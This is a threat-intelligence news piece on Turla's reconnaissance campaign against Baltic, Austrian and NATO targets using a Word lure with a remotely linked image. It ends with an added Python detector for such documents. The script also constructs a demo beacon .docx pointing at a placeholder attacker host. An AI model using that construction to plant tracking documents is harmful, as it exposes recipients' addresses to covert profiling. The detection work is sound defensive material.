RUSSIAN HACKER GROUP ‘TURLA’ BEHIND THE ATTACKS.
According to the cybersecurity company Sekoia, the Russian state-sponsored hacking group Turla is running a new reconnaissance campaign against the Austrian Economic Chamber, a NATO e-learning platform and the Baltic Defense College.
Sekoia's finding builds on earlier reporting by Google's Threat Analysis Group (TAG), which tracks Russian threat actors, both independent and state-sponsored. While pivoting on the infrastructure TAG had flagged, Sekoia analysts observed Turla operators targeting an Austrian federal organisation and a military institution in the Baltic region.
Google had already warned of renewed activity in the region by Russia-based threat actors, noting that two Turla-attributed domains were in use in ongoing operations.
Turla has been in the news since at least 2014 and is widely assessed to have close ties to the Russian Federation's FSB. The group's activity is closely monitored and well documented: it was recently observed deploying backdoors and Remote Access Trojans (RATs) against EU governments, embassies and research institutes. Attribution of the current campaign rests on an IP address believed to be used by the group, which ties the new infrastructure to the targeted organisations.
The first target is the Baltic Defense College in Estonia, a military college jointly operated by Estonia, Latvia and Lithuania that serves as a centre for strategic and operational research in the Baltic region. The second is the Austrian Federal Economic Chamber (WKO), which advises government on legislation and on economic sanctions. The third is the e-learning portal of the NATO Joint Advanced Distributed Learning (JADL) platform.
Sekoia's detective work is worth describing. The Turla domains were found to be hosting a Word document named 'War Bulletin19.00 CET 27.04.docx', placed under several directory paths on the sites. The document contains no malicious macros. Its reconnaissance value lies in a PNG image that is not stored inside the file but referenced from the attackers' server: each time the document is opened, Word fetches the image, and the server learns the opener's IP address together with whatever else the HTTP request carries, such as the client's User-Agent. From that discovery, Sekoia concluded that Turla was targeting an Austrian federal organisation and a military institution in the Baltic region.
To assist defenders, Sekoia has published a YARA rule that detects the lure document.
The immediate aim of the campaign is thus to collect the IP addresses of those who open the document, which lets the group profile its victims for later phases of the operation.
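The macro-free lure described above, and the IP collection it enables, both depend on one feature of the OOXML format: a relationship whose TargetMode is "External" tells Word to fetch the part from a URL rather than from inside the .docx. The script below is an added example, not code from the article or from Sekoia. It builds two minimal .docx files in memory (a lure whose picture is linked to a remote server and a benign one whose picture is embedded), then scans every .rels part for external targets and reports which of them Word would resolve on open without any user interaction. The host name attacker.invalid is a placeholder, not a domain from the report, and the document body is reduced to the elements that matter for the check.

```python
"""
Added example, not code from the article or from Sekoia: flag Word
documents that pull an image from a remote server when opened. A macro-free
reconnaissance lure stores no image in the .docx; it references one through
a relationship with TargetMode="External", so Word fetches it on open and
the server learns the opener's IP address. The .docx files below are built
in memory for the demo; "attacker.invalid" is a placeholder, not a domain
from the report.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Relationship types Word resolves without user interaction. A hyperlink is
# also "External" but only fires on a click, so it is reported but not
# treated as a beacon.
AUTO_FETCHED = {"image", "attachedTemplate", "oleObject"}


def find_external_targets(docx_bytes: bytes):
    """Return (rels part, rel id, short type, target) for every relationship
    in the package whose TargetMode is "External"."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.findall(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rel.get("Id"), short_type, rel.get("Target")))
    return hits


def is_beacon_document(docx_bytes: bytes) -> bool:
    """True when merely opening the document would cause an outbound fetch."""
    return any(t in AUTO_FETCHED for _, _, t, _ in find_external_targets(docx_bytes))


def build_docx(image_target: str, external: bool) -> bytes:
    """Construct a minimal .docx with one picture and one hyperlink.
    external=True links the picture to image_target (r:link plus
    TargetMode="External"); external=False embeds it as word/media/image1.png."""
    mode = ' TargetMode="External"' if external else ""
    blip_attr = "r:link" if external else "r:embed"
    content_types = (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Default Extension="png" ContentType="image/png"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        "</Types>"
    )
    root_rels = (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/officeDocument" Target="word/document.xml"/>'
        "</Relationships>"
    )
    doc_rels = (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/image" Target="{image_target}"{mode}/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}/hyperlink" Target="https://example.com/" TargetMode="External"/>'
        "</Relationships>"
    )
    # Body reduced to the parts that matter: the picture's blip and a hyperlink.
    document = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        f'xmlns:r="{OFFICE_REL}" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">'
        f'<w:body><w:p><w:r><w:drawing><a:blip {blip_attr}="rId1"/></w:drawing></w:r>'
        '<w:hyperlink r:id="rId2"><w:r><w:t>link</w:t></w:r></w:hyperlink></w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
        if not external:
            zf.writestr("word/media/image1.png", b"\x89PNG\r\n\x1a\n")  # stub PNG header only
    return buf.getvalue()


if __name__ == "__main__":
    lure = build_docx("http://attacker.invalid/bulletin.png", external=True)
    benign = build_docx("media/image1.png", external=False)
    for label, doc in (("lure", lure), ("benign", benign)):
        verdict = "beacon" if is_beacon_document(doc) else "clean"
        print(label, verdict, find_external_targets(doc))
```

Run against a real file by replacing the constructed bytes with the contents of a .docx; the same check applies to .xlsx and .pptx, whose .rels parts follow the identical schema. The scan deliberately reads only the relationship parts rather than the document body, because a linked image leaks the opener's address whether or not the picture is visible on the page.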